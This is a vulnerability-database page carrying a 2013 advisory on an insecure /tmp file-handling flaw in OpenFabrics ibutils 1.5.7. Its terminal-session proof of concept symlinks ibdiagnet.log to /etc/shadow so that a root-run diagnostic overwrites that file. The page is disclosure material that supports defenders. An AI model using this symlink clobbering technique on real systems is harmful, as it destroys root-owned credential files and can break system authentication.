Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenFabrics ibutils 1.5.7 /tmp File Clobber

🗓️ 07 Mar 2013 00:00:00Reported by Larry W. CashdollarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

OpenFabrics ibutils 1.5.7 /tmp File Clobber vulnerability with symlink attac

Code
`OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability   
  
3/6/2013  
Larry W. Cashdollar  
@_larry0  
  
The infiniband diagnostic utiltiy handles files in /tmp insecurely. A malicious user can clobber root owned files with common symlink attacks.  
  
http://www.openfabrics.org/downloads/ibutils/  
  
[nobody@exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log  
[nobody@exdb01 tmp]$ ls -l ibdiagnet.log lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow [nobody@exdb01 tmp]$  
The following files are created, I imagine anyone of them can be used.  
  
[root@exdb01 tmp]# ls -l /tmp/ibdiagnet* -rw-r--r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db -rw-r--r-- 1 root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs -rw-r--r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log -rw-r--r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log -rw-r--r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst -rw-r--r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs -rw-r--r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey -rw-r--r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl -rw-r--r-- 1 root root 179228 Mar 6 18:20 /tmp/ibdiagnet.slvl -rw-r--r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm  
After root runs a diagnostic command:  
  
[root@exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7 -W- Topology file is not specified.  
  
Reports regarding cluster links will use direct routes. Loading IBDM from: /usr/lib64/ibdm1.5.7 -W- A few ports of local device are up.  
  
Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.  
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered. .  
.  
.  
.  
  
Extracting SL Based Routing Info 0 0  
Please see /tmp/ibdiagnet.log for complete log  
  
-I- Done. Run time was 2 seconds.  
Symlinked files are overwritten:  
  
[root@exdb01 tmp] ls -l /etc/shadow  
-rw------- 1 root root 2359 Mar 6 18:17 /etc/shadow [root@exdb01 tmp] head /etc/shadow  
-W- Topology file is not specified.  
  
Reports regarding cluster links will use direct routes. -W- A few ports of local device are up.  
  
Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.  
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.  
  
-I--------------------------------------------------- -I- Bad Guids/LIDs Info  
Versions installed  
  
[root@exdb01 tmp] rpm -aq |grep ibutils ibutils-1.5.7-1.el5  
ibutils-libs-1.5.7-1.el5  
ibutils-devel-1.5.7-1.el5  
[root@exdb01 tmp]   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2013 00:00Current
openfabricsibutilssymlink attackvulnerabilityclobberinginsecure handlingroot owned filescommon symlink attacksdiagnostic utilitymalicious user/tmp directoryinsecure filesrpm installation
20